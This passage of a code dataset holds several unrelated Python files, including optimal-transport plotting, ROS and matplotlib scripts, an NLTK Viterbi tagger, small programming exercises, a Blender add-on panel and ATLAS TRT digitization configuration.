v_stack), 1 / cp.exp(C)))\n obj = eta * cp.sum(cp.exp((u_stack + v_stack - C) / eta))\n obj += tau * cp.sum(cp.multiply(cp.exp(- u / tau), a))\n obj += tau * cp.sum(cp.multiply(cp.exp(- v / tau), b))\n\n prob = cp.Problem(cp.Minimize(obj))\n prob.solve()\n\n return prob.value, u.value, v.value\n\nopt_val, ustar, vstar = solve_g_dual_cp(C, r, c, eta, tau)\nprint(ustar.shape, vstar.shape)\nustar = ustar.reshape(-1, 1)\nvstar = vstar.reshape(-1, 1)\n\nu, v, info = sinkhorn_uot(C, r, c, eta=eta, t1=tau, t2=tau, early_stop=False, n_iter=1000)\n\ndelta_list = []\ngeom_list = []\n\nmax_ratio_list = []\nratio_list = []\nbound_list = []\n\n\nprint(info['stop_iter'])\nfor i in range(info['stop_iter']):\n delta = np.max([supnorm(info['u_list'][i] - ustar), supnorm(info['v_list'][i] - vstar)])\n delta_list.append(delta)\n\n if i == 0:\n geom_list.append(delta)\n bound_list.append(tau * (np.max([supnorm(np.log(r)), supnorm(np.log(c))]) + np.max([supnorm(C) / eta - np.log(nr), np.log(nr)])))\n else:\n geom_list.append(geom_list[-1] * (tau / (tau + eta)))\n bound_list.append(bound_list[-1] * (tau / (tau + eta)))\n\n\n max_ratio = geom_list[-1] / delta_list[-1]\n max_ratio_list.append(max_ratio)\n\n if i > 0:\n ratio = delta_list[-2] / delta_list[-1]\n ratio_list.append(ratio)\n\n# print(delta_list)\nprint(geom_list)\nfig, ax = plt.subplots(2, 1)\nplt.rcParams.update({'font.size': 22})\n# plt.figure(figsize=(10, 8))\nax[0].plot(range(info['stop_iter']-1), ratio_list, linewidth=2, label='$\\Delta_{k-1} / \\Delta_{k}$')\nax[1].plot(range(info['stop_iter']+1), info['f_val_list'], linewidth=2)\n# plt.plot(epsilon_list, [tmp / 1000 for tmp in k_list_empirical_true], \"r\", linewidth=4, label=r\"$k_{true}$\")\n# plt.plot(epsilon_list, [tmp / 1000 for tmp in k_list_empirical_first], \"g\", linewidth=4, label=r\"$k_{first}$\")\n# plt.plot(epsilon_list, [tmp / 1000 for tmp in k_list_formula], \"b\", linewidth=4, label=r\"$k_{formula}$\")\n# plt.xlabel(\"epsilon\")\nplt.xlabel(\"k (iterations)\")\nplt.legend(prop={'size': 30})\n\nplt.savefig('delta_rate.eps', bbox_inches='tight')\n# plt.savefig('k_comparison.png', bbox_inches='tight')\nplt.show()\n","sub_path":"geo_rate_delta.py","file_name":"geo_rate_delta.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 
+{"seq_id":"302573246","text":"import pylab\nfrom math import *\nimport time\nfrom numpy import *\n\npylab.ion()\n\nnum_scans = 30\nscan_size = 681\nmin_angle = -2.08621\nmax_angle = 2.08621\nangle_increment = 0.00613592 \n\n\ndiscard_headers = lambda text: text[6:]\ndata2float = lambda string: float(string[:-1])\n\ndata = []\n\nfor i in range(1, num_scans + 1):\n f = open('scans2/scan' + str(i) + '.txt')\n text = discard_headers(f.readlines())\n current_scan = [data2float(text[i]) for i in range(len(text))]\n data.append(current_scan)\n\ndef plotScan(scan):\n x_data = [scan[it] * cos(min_angle + it*angle_increment) for it in range(len(scan))]\n y_data = [scan[it] * sin(min_angle + it*angle_increment) for it in range(len(scan))]\n pylab.plot(x_data, y_data, 'ro')\n pylab.show()\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\nplt.ion()\n\n# def f(x, y):\n# return np.sin(x) + np.cos(y)\n\n# x = np.linspace(0, 2 * np.pi, 120)\n# y = np.linspace(0, 2 * np.pi, 100).reshape(-1, 1)\n\n# im = plt.imshow(f(x, y), cmap=plt.get_cmap('jet'))\n\n# def updatefig(*args):\n# global x,y\n# x += np.pi / 15.\n# y += np.pi / 20.\n# im.set_array(f(x,y))\n# return im,\n\n# ani = animation.funcanimation(fig, updatefig, interval=50, blit=true)\n# plt.show()\n\nget_x = lambda scan: array([scan[it] * cos(min_angle + it*angle_increment) for it in range(len(scan))])\nget_y = lambda scan: array([scan[it] * sin(min_angle + it*angle_increment) for it in range(len(scan))])\n\nfig = plt.figure()\nax1 = plt.subplot(121)\nax1.axis([-5,5,-5,5])\n\nif True:\n scatter, = plt.plot(get_x(data[20]), get_y(data[20]), 'ro')\n scatter.set_data([], [])\n x_data = get_x(data[0])\n y_data = get_y(data[0])\n scatter.set_data(x_data, y_data)\n \nax2 = plt.subplot(122)\nax2.axis([-5,5,-5,5])\n\n\nscatter, = plt.plot(get_x(data[20]), get_y(data[20]), 'ro')\nscatter.set_data([], [])\n\ndef update_plot(i):\n x_data = get_x(data[i])\n y_data = get_y(data[i])\n scatter.set_data(x_data, y_data)\n # plt.draw()\n # time.sleep(0.5)\n # scatter.set_data([], [])\n return scatter,\n\nani = animation.FuncAnimation(fig,\n update_plot,\n interval=50,\n frames=xrange(num_scans),\n blit=False)\nplt.show()\n","sub_path":"python/matplotlib/laserScans/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"100309773","text":"#!/usr/bin/env python\n\nimport rospy\nimport tf\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Twist\n\n\n\ndef robot1frame(odom):\n\tbr = tf.TransformBroadcaster()\n\tx = odom.pose.pose.position.x\n\ty = odom.pose.pose.position.y\n\tz = odom.pose.pose.position.z\n\tqx = odom.pose.pose.orientation.x\n\tqy = odom.pose.pose.orientation.y\n\tqz = odom.pose.pose.orientation.z\n\tqw = odom.pose.pose.orientation.w\n\tbr.sendTransform((x,y,z),(qx,qy,qz,qw),rospy.Time.now(),\"robot1/trueOdom\",\"robot1/world\")\n\t\n# creates a fixed goal frame called \"goal\" in tf \ndef goalframe(twi):\n\tbr = tf.TransformBroadcaster()\n\trate = rospy.Rate(10.0)\n\tx = twi.linear.x\n\ty = twi.linear.y\n\tbr.sendTransform((x,y,0.0),(0.0,0.0,0.0,1.0),rospy.Time.now(),\"robot1/goal\",\"robot1/world\")\n\nif __name__ == '__main__':\n try:\n \trospy.init_node('tf_boadcaster1',anonymous=True)\n \trospy.Subscriber(\"/robot_1/base_pose_ground_truth\",Odometry,robot1frame)\n \trospy.Subscriber(\"/robot_1/goal\",Twist,goalframe)\n \trospy.spin()\n except 
rospy.ROSInterruptException: pass","sub_path":"src/frames1.py","file_name":"frames1.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"203536271","text":"import csv\nimport numpy as np\nimport random\nimport ast\n\nimport nltk\nimport nltk.classify.util\nimport nltk.metrics\nfrom nltk.classify import MaxentClassifier\nfrom nltk.collocations import BigramCollocationFinder\nfrom nltk.metrics import BigramAssocMeasures\nfrom nltk.probability import FreqDist, ConditionalFreqDist\nfrom sklearn.model_selection import cross_validate\nfrom nltk.classify import MaxentClassifier\n\n\ndef calculate_transition_probs(labels):\n counts = {}\n for label_set in labels:\n for i in range(len(label_set)):\n if i < 1:\n prev_label = \"\"\n counts[\"\"] = counts.get(\"\", 0) + 1\n\n else:\n prev_label = str(label_set[i-1])\n curr_label = str(label_set[i])\n\n counts[curr_label] = counts.get(curr_label, 0) + 1\n counts[prev_label +\n curr_label] = counts.get(prev_label + curr_label, 0) + 1\n return counts\n\n\ndef hmm_counts(words, labels):\n counts = {\"\": 0}\n x = 0\n for x in range(len(labels)):\n for i in range(len(labels[x])):\n curr_word = words[x][i]\n curr_label = str(labels[x][i])\n if(not curr_word+curr_label in counts.keys()):\n counts[\"\"] += 1\n counts[curr_word +\n curr_label] = counts.get(curr_word + curr_label, 0) + 1\n return counts\n\n\ndef return_featureset(words, pos_seq, i):\n feature_dict = {}\n feature_dict[\"POS\"] = pos_seq[i]\n feature_dict[\"word\"] = words[i]\n if i >= 2:\n feature_dict[\"2before\"] = words[i-2]\n feature_dict[\"1before\"] = words[i-1]\n else:\n feature_dict[\"2before\"] = None\n feature_dict[\"1before\"] = None\n if i < len(words)-2:\n feature_dict[\"1after\"] = words[i+1]\n feature_dict[\"2after\"] = words[i+2]\n else:\n feature_dict[\"1after\"] = None\n feature_dict[\"2after\"] = None\n\n return feature_dict\n\n\ndef create_classifier():\n with open('./data_release/train.csv', encoding='latin-1') as f:\n feature_set = []\n lines = csv.reader(f)\n next(lines)\n for line in lines:\n label_seq = ast.literal_eval(line[2])\n words = line[0].split()\n pos_seq = ast.literal_eval(line[1])\n for i in range(len(words)):\n feature_dict = return_featureset(words, pos_seq, i)\n feature_set.append((feature_dict, label_seq[i]))\n\n classifier = nltk.MaxentClassifier.train(feature_set, max_iter=2)\n return classifier\n\n\ndef viterbi_segment(text, pos_seq, counts, classifier, hmmcounts, isHMM):\n n = len(text)\n words = [''] + list(text)\n\n SCORE = [0]*2\n for i in range(2):\n SCORE[i] = [0] * n\n BPTR = [0]*2\n for i in range(2):\n BPTR[i] = [0] * n\n\n feature_dict = return_featureset(words, pos_seq, 0)\n probs = classifier.prob_classify(featureset=feature_dict)\n SCORE[0][0] = (counts[\"0\"]/counts[\"\"]) * \\\n classifier.prob_classify(featureset=feature_dict).prob(0)\n SCORE[1][0] = (counts[\"1\"]/counts[\"\"]) * \\\n classifier.prob_classify(featureset=feature_dict).prob(1)\n #SCORE[0][0] = classifier.prob_classify(featureset=feature_dict).prob(0)\n #SCORE[1][0] = classifier.prob_classify(featureset=feature_dict).prob(1)\n BPTR[0][0] = None\n BPTR[1][0] = None\n\n c = 0\n\n for t in range(1, n):\n if(not isHMM):\n if classifier.prob_classify(feature_dict).prob(0) < classifier.prob_classify(feature_dict).prob(1)+.5:\n # print(\"HERE\")\n # print(classifier.prob_classify(feature_dict).prob(0))\n # print(classifier.prob_classify(feature_dict).prob(1))\n c += 1\n feature_dict = 
return_featureset(words, pos_seq, t)\n\n if SCORE[0][t-1]*(counts[\"00\"]/counts[\"0\"]) >= SCORE[1][t-1] * (counts[\"10\"]/counts[\"1\"]):\n #SCORE[0][t] = SCORE[0][t-1]* (counts[\"00\"]/counts[\"0\"]) * classifier.prob_classify(feature_dict).prob(0)\n SCORE[0][t] = SCORE[0][t-1] * \\\n classifier.prob_classify(feature_dict).prob(0)\n BPTR[0][t] = 0\n else:\n #SCORE[0][t] = SCORE[1][t-1]* (counts[\"10\"]/counts[\"1\"]) * classifier.prob_classify(feature_dict).prob(0)\n SCORE[0][t] = SCORE[1][t-1] * \\\n classifier.prob_classify(feature_dict).prob(0)\n BPTR[0][t] = 1\n\n if SCORE[0][t-1]*(counts[\"01\"]/counts[\"0\"]) >= SCORE[1][t-1] * (counts[\"11\"]+1000/counts[\"1\"]):\n #SCORE[1][t] = SCORE[0][t-1]*(counts[\"01\"]/counts[\"0\"]) * classifier.prob_classify(feature_dict).prob(1)\n SCORE[1][t] = SCORE[0][t-1] * \\\n (classifier.prob_classify(feature_dict).prob(1)+.5)\n BPTR[1][t] = 0\n else:\n #SCORE[1][t] = SCORE[1][t-1]*(counts[\"11\"]/counts[\"1\"]) * classifier.prob_classify(feature_dict).prob(1)\n SCORE[1][t] = SCORE[1][t-1] * \\\n (classifier.prob_classify(feature_dict).prob(1)+.5)\n BPTR[1][t] = 1\n else:\n feature_dict = return_featureset(words, pos_seq, t)\n\n word0 = \"\"\n word1 = \"\"\n if(feature_dict[\"word\"]+\"0\" in hmmcounts.keys()):\n word0 = feature_dict[\"word\"]+\"0\"\n elif(feature_dict[\"word\"]+\"1\" in hmmcounts.keys()):\n word1 = feature_dict[\"word\"]+\"1\"\n\n if SCORE[0][t-1]*(counts[\"00\"]/counts[\"0\"]) >= SCORE[1][t-1] * (counts[\"10\"]/counts[\"1\"]):\n SCORE[0][t] = SCORE[0][t-1] * \\\n (counts[\"00\"]/counts[\"0\"]) * (hmmcounts[word0]/counts[\"0\"])\n BPTR[0][t] = 0\n else:\n SCORE[0][t] = SCORE[1][t-1] * \\\n (counts[\"10\"]/counts[\"1\"]) * (hmmcounts[word0]/counts[\"0\"])\n BPTR[0][t] = 1\n\n if SCORE[0][t-1]*(counts[\"01\"]/counts[\"0\"]) >= SCORE[1][t-1] * (counts[\"11\"]/counts[\"1\"]):\n SCORE[1][t] = SCORE[0][t-1] * \\\n (counts[\"01\"]/counts[\"0\"]) * (hmmcounts[word1]/counts[\"1\"])\n BPTR[1][t] = 0\n else:\n SCORE[1][t] = SCORE[1][t-1] * \\\n (counts[\"11\"]/counts[\"1\"]) * (hmmcounts[word1]/counts[\"1\"])\n BPTR[1][t] = 1\n\n sequence = []\n counter = n-1\n\n if SCORE[0][n-1] > SCORE[1][n-1]:\n sequence.append(0)\n a = BPTR[0][counter]\n else:\n sequence.append(1)\n a = BPTR[1][counter]\n\n while a is not None:\n counter -= 1\n sequence.append(a)\n a = BPTR[a][counter]\n print(sequence[::-1])\n return sequence[::-1]\n\n\ndef predict_classes():\n total_labels = []\n total_words = []\n with open('./data_release/train.csv', encoding='latin-1') as f:\n lines = csv.reader(f)\n next(lines)\n for line in lines:\n word_seq = line[0].split()\n label_seq = ast.literal_eval(line[2])\n total_words.append(word_seq)\n total_labels.append(label_seq)\n\n counts = calculate_transition_probs(total_labels)\n hmmC = hmm_counts(total_words, total_labels)\n classifier = create_classifier()\n\n with open('./data_release/train.csv', encoding='latin-1') as f:\n lines = csv.reader(f)\n next(lines)\n for line in lines:\n words = line[0].split()\n pos_seq = ast.literal_eval(line[1])\n curr_sequence = viterbi_segment(\n words, pos_seq, counts, classifier, hmmC, True)\n # print(curr_sequence)\n\n\npredict_classes()\n","sub_path":"p2/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":7642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"618669807","text":"def IsAscending(a):\n i = 1\n step = 1\n\n while i < len(a) and step > 0:\n step = a[i] - a[i-1]\n i += 1\n \n if step > 0:\n return \"YES\"\n 
else:\n return \"NO\"\n \n \na = list(map(int, input().split()))\nprint(IsAscending(a))","sub_path":"4 lesson (functions, classes)/burkova/111152.py","file_name":"111152.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"245039755","text":"# Copyright (C) 2019 Christopher Gearhart\n# chris@bblanimation.com\n# http://bblanimation.com/\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n# System imports\nimport bpy\nfrom bpy.props import *\nfrom bpy.types import Panel\n\n# updater import\nfrom .app_handlers import *\nfrom ..functions.common import *\nfrom .. import addon_updater_ops\n\nclass PROPERTIES_PT_abs_plastic_materials(Panel):\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"material\"\n bl_label = \"ABS Plastic Materials\"\n bl_idname = \"PROPERTIES_PT_abs_plastic_materials\"\n # bl_category = \"ABS Plastic Materials\"\n # COMPAT_ENGINES = {\"CYCLES\", \"BLENDER_EEVEE\"}\n\n # @classmethod\n # def poll(cls, context):\n # \"\"\" ensures operator can execute (if not, returns false) \"\"\"\n # return True\n\n def draw(self, context):\n layout = self.layout\n scn = context.scene\n\n # Call to check for update in background\n # Internally also checks to see if auto-check enabled\n # and if the time interval has passed\n addon_updater_ops.check_for_update_background()\n # draw auto-updater update box\n addon_updater_ops.update_notice_box_ui(self, context)\n\n col = layout.column(align=True)\n row = col.row(align=True)\n row.operator(\"abs.append_materials\", text=\"Import ABS Plastic Materials\", icon=\"IMPORT\")\n # row = col.row(align=True)\n # row.operator(\"abs.mark_outdated\", text=\"Mark Materials as Outdated\", icon=\"LIBRARY_DATA_OVERRIDE\" if b280() else \"GO_LEFT\")\n\n # material settings\n col = layout.column(align=True)\n col.label(text=\"Properties:\")\n row = col.row(align=True)\n row.prop(scn, \"abs_subsurf\")\n row = col.row(align=True)\n row.prop(scn, \"abs_roughness\")\n row = col.row(align=True)\n row.prop(scn, \"abs_randomize\")\n\n\n row = col.row(align=True)\n row.label(text=\"UV Details:\")\n row = col.row(align=True)\n row.prop(scn, \"uv_detail_quality\", text=\"Quality\")\n row = col.row(align=True)\n row.prop(scn, \"abs_fingerprints\")\n row = col.row(align=True)\n row.prop(scn, \"abs_displace\")\n # row = col.row(align=True)\n # row.prop(scn, \"abs_uv_scale\")\n row = col.row(align=True)\n row.prop(scn, \"save_datablocks\")\n if b280():\n row = col.row(align=True)\n row.prop(scn, \"abs_viewport_transparency\")\n","sub_path":"All_In_One/addons/abs-plastic-materials-master/ui/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"644350691","text":"N = int(input())\nS = str(input())\nans = 0\n\n# Iを000-999まで1桁ずつずらしてSの要素が左から含まれるか検証\nfor i in range(1000):\n 
I = str(i)\n I = I.zfill(3)\n count = 0\n for n in range(N):\n if count==0:\n if I[0]==S[n]:\n count=1\n elif count==1:\n if I[1]==S[n]:\n count=2\n elif count==2:\n if I[2]==S[n]:\n count=3\n if count==3:\n ans+=1\nprint(ans)","sub_path":"SMBC2019D.py","file_name":"SMBC2019D.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"324298310","text":"from stack import Stack\n\ndef parChecker(par_string):\n \"\"\"\n This problem takes advantage of fact that any balanced parentheis string will have\n equal number of open '(' and close ')' parenthesis and in correct order. \n \"\"\"\n balanced = True\n length_of_par_string = len(par_string)\n i = 0\n s = Stack()\n while i < length_of_par_string and balanced:\n \"if '(' is found, '(' pushed to stack.\"\n if par_string[i] == '(':\n s.push(par_string[i])\n else:\n \"\"\"\n look for the condition where stack is empty, \n if stack is empty before the end of iteration which means\n you had unbalanced stack before end of While loop.\n unbalanced stack will execute statement below.\n \"\"\"\n if s.isEmpty():\n balanced = False\n else:\n \"\"\"\n if stack instance is not empty we have to pop \n ')'\n \"\"\"\n s.pop()\n i = i + 1\n\n if balanced and s.isEmpty():\n return True\n else:\n return False\n\nif __name__ == \"__main__\":\n print(parChecker('((()))'))\n print(parChecker('(()'))\n","sub_path":"ParChecker.py","file_name":"ParChecker.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"39247367","text":"#!/usr/bin/env python\nimport argparse\nimport os \nimport sys\nimport pandas as pd \nimport re\nglobal args\nfirst = True\n\ndef describe(row):\n size = \"{:.0f}kbp\".format( (row.qe - row.qs)/1000.0 )\n sm = row.r\n if (row.strand == \"+\" and row.direction == \">\") or (row.strand == \"-\" and row.direction == \"<\"):\n t = \"INS\"\n else:\n t = \"INV\"\n if(sm == args.ref and t == \"INS\"):\n return(f\"Syntenic\") \n else:\n return(\"{}_{}\".format(t, size, sm))\n\n #f1 = \"fc\"\n #f2 = \"fc\"\n #if row.strand == \"-\" : f1 = \"rc\"\n #if row.direction == \"<\": f2 = \"rc\"\n #return f\"the {f1} of {row.q}:{row.qs}-{row.qe} aligns to the {f2} of {row.r}:{row.rs}-{row.re}\"\n \n\n\n\n\ndef parse_path(row):\n global first\n row = row.copy()\n paths = re.findall(r\"(>|<)([^<>:]+):(\\d+)-(\\d+)\", row.path) \n # 100% syntenicA\n #out = {\"direction\":[], \"q\":[], \"qs\":[], \"qe\":[], \"path\":[],\"paths\":[], \"pathe\":[]}\n out = []\n if(len(paths) == 0 ):\n #print(f\"{row.q}\\t{row.qs}\\t{row.qe}\\t{row.path}\\t{row.paths}\\t{row.pathe}\\tsyntenic\")\n out.append((row.q, row.qs, row.qe, row.ql, row.path, row.paths, row.pathe, row.strand, \">\"))\n \n #print()\n #print(paths) \n # path through the graph\n first = True\n for idx, path in enumerate(paths):\n direction, ref, start, end = path[0], path[1], int(path[2]),int(path[3])\n if(idx==0):\n start = start + row.paths\n if(idx == len(paths)-1 ):\n end = end - (row.pathl - row.pathe)\n\n qs = row.qs\n qe = qs + end-start\n row.qs += end - start\n #if(row.reference == ref ):\n # status = \"syntenic\"\n #else:\n # status = \"insertion\"\n \n out.append((row.q, qs, qe, row.ql, ref, start, end, row.strand, direction))\n\n out = pd.DataFrame(out, columns=[\"q\", \"qs\", \"qe\", \"ql\", \"r\", \"rs\", \"re\", \"strand\", \"direction\"])\n out[\"description\"] = out.apply(describe, axis=1)\n 
#out.sort_values(by=[\"q\",\"qs\"]).to_csv(sys.stdout, sep=\"\\t\", header=first, index=False)\n out.sort_values(by=[\"q\",\"qs\"], inplace=True)\n first=False\n return(out)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"\", formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"infile\", help=\"positional input\")\n parser.add_argument(\"-r\", \"--ref\", help=\"Main reference sequence to compare to\", default = \"CHM13.pri__1\")\n parser.add_argument(\"-n\", \"--number\", help=\"numeric option\", type=int, default=5)\n parser.add_argument(\"-l\", \"--list\", nargs=\"*\", help=\"list with zero or more entries\")\n parser.add_argument(\"-l2\", \"--list2\", nargs=\"+\", help=\"list one or more entries\")\n parser.add_argument('-d', help=\"store args.d as true if -d\", action=\"store_true\", default=False)\n args = parser.parse_args()\n\n colnames = [\"q\", \"ql\", \"qs\", \"qe\",\"strand\", \"path\", \"pathl\", \"paths\", \"pathe\", \"matches\", \"block\", \"qual\"]\n gaf = pd.read_csv(args.infile, header=None, sep=\"\\t\").loc[: ,0:(len(colnames)-1)]; gaf.columns = colnames\n gaf[\"reference\"] = args.ref\n #print(gaf[colnames[0:7]])\n\n out = pd.concat( list(gaf.apply(parse_path, axis = 1)) )\n out.sort_values(by=[\"q\",\"qs\"]).to_csv(sys.stdout, sep=\"\\t\", header=True, index=False)\n for (q, r), group in out.groupby(by = [\"q\", \"r\"]):\n syn = group[group.description == \"Syntenic\"]\n if(r != args.ref or syn.shape[0] <= 1):\n continue\n shift = syn.shift(periods=1)\n deletions = ((syn.qs - shift.qe).abs() < 5000)\n for idx, d in enumerate(deletions):\n if(not d):\n continue\n cur = syn.iloc[idx -1]\n nxt = syn.iloc[idx]\n size = \"{:.0f}kbp\".format( (nxt.rs - cur.re)/1000 )\n #print(cur, nxt, size)\n print(f\"{cur.q}\\t{cur.qe}\\t{cur.qe}\\t{cur.ql}\\t{cur.r}\\t{cur.re}\\t{nxt.rs}\\t+\\t>\\tDEL_{size}\")\n \n\n\n\n\n\n\n","sub_path":"scripts/GAF_parsing.py","file_name":"GAF_parsing.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"413479039","text":"\n\nfrom xai.brain.wordbase.adjectives._surly import _SURLY\n\n#calss header\nclass _SURLIEST(_SURLY, ):\n\tdef __init__(self,): \n\t\t_SURLY.__init__(self)\n\t\tself.name = \"SURLIEST\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"surly\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_surliest.py","file_name":"_surliest.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"294834779","text":"# Copyright (C) 2002-2020 CERN for the benefit of the ATLAS collaboration\n\nfrom AthenaCommon import CfgMgr\n# The earliest bunch crossing time for which interactions will be sent\n# to the TRT Digitization code.\ndef TRT_FirstXing():\n return -50\n\n# The latest bunch crossing time for which interactions will be sent\n# to the TRT Digitization code.\ndef TRT_LastXing():\n return 50\n\ndef getTRTRange(name=\"TRTRange\", **kwargs):\n #this is the time of the xing in ns\n kwargs.setdefault('FirstXing', TRT_FirstXing() )\n kwargs.setdefault('LastXing', TRT_LastXing() )\n kwargs.setdefault('CacheRefreshFrequency', 1.0 ) #default 0 no dataproxy reset\n kwargs.setdefault('ItemList', [\"TRTUncompressedHitCollection#TRTUncompressedHits\"] )\n from AthenaCommon import CfgMgr\n return CfgMgr.PileUpXingFolder(name, **kwargs)\n\ndef BasicTRTDigitizationTool(name, **kwargs):\n\n 
from AthenaCommon.Resilience import protectedInclude\n protectedInclude (\"TRT_Digitization/TRT_Digitization_CommonOptions.py\")\n kwargs.setdefault(\"PAI_Tool_Xe\", \"TRT_PAI_Process_Xe\")\n kwargs.setdefault(\"PAI_Tool_Ar\", \"TRT_PAI_Process_Ar\")\n kwargs.setdefault(\"PAI_Tool_Kr\", \"TRT_PAI_Process_Kr\")\n\n from Digitization.DigitizationFlags import digitizationFlags\n #flag from Simulation/Digitization\n if not digitizationFlags.doInDetNoise.get_Value():\n kwargs.setdefault(\"Override_noiseInSimhits\", 0)\n kwargs.setdefault(\"Override_noiseInUnhitStraws\", 0)\n #kwargs.setdefault(\"Override_useMagneticFieldMap=0)\n #TRT xenon range cut\n trtRangeCut=0.05\n if hasattr(digitizationFlags, 'TRTRangeCut'):\n trtRangeCut = digitizationFlags.TRTRangeCut.get_Value()\n kwargs.setdefault(\"Override_TrtRangeCutProperty\", trtRangeCut)\n\n # Import Beam job properties\n from AthenaCommon.BeamFlags import jobproperties\n if jobproperties.Beam.beamType == \"cosmics\" :\n kwargs.setdefault(\"PrintDigSettings\", True)\n kwargs.setdefault(\"Override_cosmicFlag\", 0)\n kwargs.setdefault(\"Override_doCosmicTimingPit\", 1)\n kwargs.setdefault(\"Override_jitterTimeOffset\", 0.)\n kwargs.setdefault(\"Override_timeCorrection\", 0)\n\n if digitizationFlags.doXingByXingPileUp():\n kwargs.setdefault(\"FirstXing\", TRT_FirstXing())\n kwargs.setdefault(\"LastXing\", TRT_LastXing())\n\n ##else:\n ## from AthenaCommon.DetFlags import DetFlags\n ## from AthenaCommon.AppMgr import ServiceMgr\n ## from PileUpComps.PileUpCompsConf import PileUpXingFolder\n ## if DetFlags.pileup.TRT_on():\n ## TRTRange = PileUpXingFolder( \"TRTRange\" )\n ## TRTRange.ItemList += [\"TRTUncompressedHitCollection#TRTUncompressedHits\"]\n ## #this is the time of the xing in ns\n ## TRTRange.FirstXing = TRT_FirstXing()\n ## TRTRange.LastXing = TRT_LastXing()\n ## TRTRange.CacheRefreshFrequency = 1.0; #default 0 no dataproxy reset\n ## # add TRTRange to known pileuo intervals\n ## ServiceMgr.PileUpMergeSvc.Intervals += [TRTRange]\n\n kwargs.setdefault(\"RandomSeedOffset\", digitizationFlags.rndmSeedOffset1.get_Value())\n return CfgMgr.TRTDigitizationTool(name,**kwargs)\n\ndef TRTDigitizationTool(name=\"TRTDigitizationTool\",**kwargs):\n from Digitization.DigitizationFlags import digitizationFlags\n if digitizationFlags.PileUpPremixing and 'OverlayMT' in digitizationFlags.experimentalDigi():\n from OverlayCommonAlgs.OverlayFlags import overlayFlags\n kwargs.setdefault(\"OutputObjectName\", overlayFlags.bkgPrefix() + \"TRT_RDOs\")\n kwargs.setdefault(\"OutputSDOName\", overlayFlags.bkgPrefix() + \"TRT_SDO_Map\")\n else:\n kwargs.setdefault(\"OutputObjectName\", \"TRT_RDOs\")\n kwargs.setdefault(\"OutputSDOName\", \"TRT_SDO_Map\")\n kwargs.setdefault(\"HardScatterSplittingMode\", 0)\n return BasicTRTDigitizationTool(name,**kwargs)\n\ndef TRTGeantinoTruthDigitizationTool(name=\"TRTGeantinoTruthDigitizationTool\",**kwargs):\n kwargs.setdefault(\"ParticleBarcodeVeto\", 0)\n return TRTDigitizationTool(name,**kwargs)\n\ndef TRTDigitizationToolHS(name=\"TRTDigitizationToolHS\",**kwargs):\n kwargs.setdefault(\"OutputObjectName\", \"TRT_RDOs\")\n kwargs.setdefault(\"OutputSDOName\", \"TRT_SDO_Map\")\n kwargs.setdefault(\"HardScatterSplittingMode\", 1)\n return BasicTRTDigitizationTool(name,**kwargs)\n\ndef TRTDigitizationToolPU(name=\"TRTDigitizationToolPU\",**kwargs):\n kwargs.setdefault(\"OutputObjectName\", \"TRT_PU_RDOs\")\n kwargs.setdefault(\"OutputSDOName\", \"TRT_PU_SDO_Map\")\n kwargs.setdefault(\"HardScatterSplittingMode\", 2)\n return 
BasicTRTDigitizationTool(name,**kwargs)\n\ndef TRTDigitizationToolSplitNoMergePU(name=\"TRTDigitizationToolSplitNoMergePU\",**kwargs):\n kwargs.setdefault(\"HardScatterSplittingMode\", 0)\n kwargs.setdefault(\"DataObjectName\", \"PileupTRTUncompressedHits\")\n kwargs.setdefault(\"OutputObjectName\", \"TRT_PU_RDOs\")\n kwargs.setdefault(\"OutputSDOName\", \"TRT_PU_SDO_Map\")\n kwargs.setdefault(\"Override_noiseInSimhits\", 0)\n kwargs.setdefault(\"Override_noiseInUnhitStraws\", 0)\n return BasicTRTDigitizationTool(name,**kwargs)\n\ndef TRTDigitizationHS(name=\"TRTDigitizationHS\",**kwargs):\n kwargs.setdefault(\"DigitizationTool\", \"TRTDigitizationToolHS\")\n return CfgMgr.TRTDigitization(name,**kwargs)\n\ndef TRTDigitizationPU(name=\"TRTDigitizationPU\",**kwargs):\n kwargs.setdefault(\"DigitizationTool\", \"TRTDigitizationToolPU\")\n return CfgMgr.TRTDigitization(name,**kwargs)\n\ndef TRT_OverlayDigitizationTool(name=\"TRT_OverlayDigitizationTool\",**kwargs):\n from OverlayCommonAlgs.OverlayFlags 